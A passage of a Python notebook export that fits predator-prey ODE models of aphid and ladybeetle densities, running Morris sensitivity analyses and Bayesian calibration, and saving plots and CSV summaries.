data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[18]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_CP1.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[19]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[20]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_CP1 = CP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_CP1.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[21]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[22]:
df_sigmai
# In[23]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_CP1.png", dpi=300)
plt.show()
# In[24]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_CP1.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[25]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[26]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_CP1,
u_CP1,
v_CP1,
CP1_model,
mean_values_params
)
pest_time_derivative_array
# In[27]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_CP1, u_CP1, '-x', label='Pest population')
plt.plot(t_computed_CP1, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_CP1.png", dpi=300)
plt.show()
# In[28]:
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[29]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_CP1 = CP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_CP1.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
CP1_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[30]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[31]:
df_sigmai
# In[32]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_CP1.png", dpi=300)
plt.show()
# In[33]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_CP1.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[34]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # a1
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def CP1_ode_wrapper(time_exp, r1, a1, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, a1]
initial_conditions = np.array([u0, v0])
y_model = solve_ivp(
CP1_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[35]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_CP1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP1_model",
CP1_ode_wrapper(
time_calibration,
r1_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP1_model",
CP1_ode_wrapper(
time_calibration,
r1_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"CP1_model",
CP1_ode_wrapper(
time_calibration,
r1_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_CP1:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_CP1 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[36]:
plt.hist(trace_calibration_CP1['a1'], bins=35)
plt.show()
# In[37]:
calibration_variable_names = [
"std_deviation",
"a1",
]
# In[38]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_CP1[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_CP1.png")
# In[39]:
az.plot_pair(
trace_calibration_CP1,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_CP1.png")
# In[40]:
df_stats_summary = az.summary(
data=trace_calibration_CP1,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[41]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[42]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_CP1, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_CP1.csv") # salvando em um csv para consultas
df_stats_summary
# In[43]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_CP1["CP1_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_CP1["CP1_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_CP1["CP1_model"], 50, axis=0)
# In[44]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_CP1.png", dpi=300)
plt.show()
# In[45]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_CP1.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_CP1.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[46]:
df_realizations
# # Constant Prey Growth FR2 model
# ## The parameter a1 doesn't have a maximum threshold
# In[47]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def CP2_model(
t,
X,
r1 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
u, v = X
u_prime = r1 - a1 * u * v / ( a2 + a3 * u )
v_prime = 0
return u_prime, v_prime
def CP2_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
solution_ODE = solve_ivp(
fun=CP2_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,a1,a2,a3),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[48]:
def CP2_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[49]:
from scipy import optimize
seed = 1234
r1=0.0010874832697555675
a1=0.5539521690253332
a2=3.795469755292592e-06
a3=0.06797623577085109
denom_min = 0.1
denom_max = 1.9
bounds_CP2 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
result_CP2 = optimize.differential_evolution(
CP2_least_squares_error_ode,
bounds=bounds_CP2,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
CP2_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_CP2)
# * Retrieving the calibrated parameter values:
# In[50]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
a1_deterministic,
a2_deterministic,
a3_deterministic,
) = result_CP2.x
solution_ODE_CP2 = CP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_CP2.x
)
t_computed_CP2, y_computed_CP2 = solution_ODE_CP2.t, solution_ODE_CP2.y
u_CP2, v_CP2 = y_computed_CP2
parameters_dict = {
"Model": "CP2",
u"$r1$": r1_deterministic,
u"$a1$": a1_deterministic,
u"$a2$": a2_deterministic,
u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[51]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_CP2, u_CP2, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_CP2, v_CP2, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[52]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[53]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = CP2_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
CP2_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[54]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[55]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_CP2.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[56]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[57]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_CP2 = CP2_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_CP2.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[58]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[59]:
df_sigmai
# In[60]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_CP2.png", dpi=300)
plt.show()
# In[61]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_CP2.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[62]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[63]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_CP2,
u_CP2,
v_CP2,
CP2_model,
mean_values_params
)
pest_time_derivative_array
# In[64]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_CP2, u_CP2, '-x', label='Pest population')
plt.plot(t_computed_CP2, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_CP2.png", dpi=300)
plt.show()
# In[65]:
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
